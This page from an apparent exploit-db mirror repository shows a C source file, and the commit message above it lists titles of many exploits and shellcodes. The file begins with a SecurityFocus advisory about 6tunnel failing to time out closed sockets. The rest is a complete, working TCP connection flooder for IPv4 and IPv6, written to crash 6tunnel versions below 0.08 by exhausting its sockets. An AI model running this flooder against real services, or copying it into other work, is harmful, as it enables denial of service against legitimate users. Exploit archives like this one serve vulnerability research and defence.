bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/dos/21126.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

137 lines
No EOL
3.6 KiB
C
Raw Blame History

// source: https://www.securityfocus.com/bid/3467/info
6tunnel is a freely available, open source software package designed to provide IPv6 functionality to hosts that do not comply with the standard. It works by creating IPv6 tunnels.
A problem has been discovered in the software package that could allow remote users to deny service to legitimate users of the service. The problem is due to the management of sockets by the software package. When a client disconnects from the 6tunnel server, the socket previously used by the client enters the CLOSE state and does not time out. Once a large number of sockets is reached, the service crashes.
This makes it possible for a malicious user to deny service to legitimate users of the service.
/*
* ipv4/ipv6 tcp connection flooder.
* Originally used as a DoS for 6tunnel (versions < 0.08).
* Version 0.08 is a broken version. Please update to 0.09.
*
* Description of options:
* -6 : flood an ipv6 address.
* port : tcp port to flood (default: 667)
* delay: delay between connections (ms).
* times: max number of connections (default: 2500).
*
* awayzzz <awayzzz@digibel.org>
* You can even find me @IRCnet if you need.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEFP 667 // default port.
#define DEFT 2500 // default number of connections.
#define TIME 100000 // delay between connections.
// tune it for best performances!
#define HAVE_IPV6
#define VALID_PORT(i) (i<65535 && i > 0)
int main(int argc,char *argv[])
{
int ret, fd, i, ip6 = 0;
int times = DEFT, port = DEFP, delay = TIME;
struct sockaddr_in sin;
#ifdef HAVE_IPV6
struct sockaddr_in6 sin6;
#endif
if( argc < 2 )
{
char *pname;
if(!(pname = strrchr(argv[0],'/')))
pname = argv[0];
else
pname++;
printf("Usage: %s [-6] ip4/6 [port] [delay (ms)] [times]\n", pname);
exit (0);
}
if(!strcmp(argv[1],"-6"))
{
#ifdef HAVE_IPV6
ip6 = 1;
#endif
argv++;
argc--;
}
if(argc > 2)
{
port = strtol(argv[2], NULL, 10);
if(!VALID_PORT(port))
{
fprintf(stderr,"Invalid port number. Using default\n");
port = DEFP;
}
}
if(argc > 3)
delay = strtol(argv[3], NULL, 10);
if(argc > 4)
times = strtol(argv[4], NULL, 10);
printf("Started with %s flood to %s on %d for %d times!\n",
(ip6 == 1) ? "ipv6" : "ipv4", argv[1], port, times);
for (i = 0; i < times; i++)
{
#ifdef HAVE_IPV6
if(ip6)
{
fd = socket(AF_INET6, SOCK_STREAM, 0);
memset(&sin6, 0, sizeof(sin6));
sin6.sin6_family = AF_INET6;
sin6.sin6_port = htons(port);
inet_pton(AF_INET6,argv[1],sin6.sin6_addr.s6_addr);
}
else
{
#endif /* HAVE_IPV6 */
fd = socket(AF_INET, SOCK_STREAM, 0);
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(port);
#ifdef HAVE_IPV6
}
if(ip6)
ret = connect(fd, (struct sockaddr *)&sin6, sizeof(sin6));
else
#endif
ret = connect(fd, (struct sockaddr *)&sin, sizeof(sin));
if(ret < 0)
{
printf("connect %d failed.\n",i);
perror("connect");
break;
}
printf("Connection no. %d\n",i);
close(fd);
usleep(delay);
}
}
/* :wq */
Reference in a new issue View git blame Copy permalink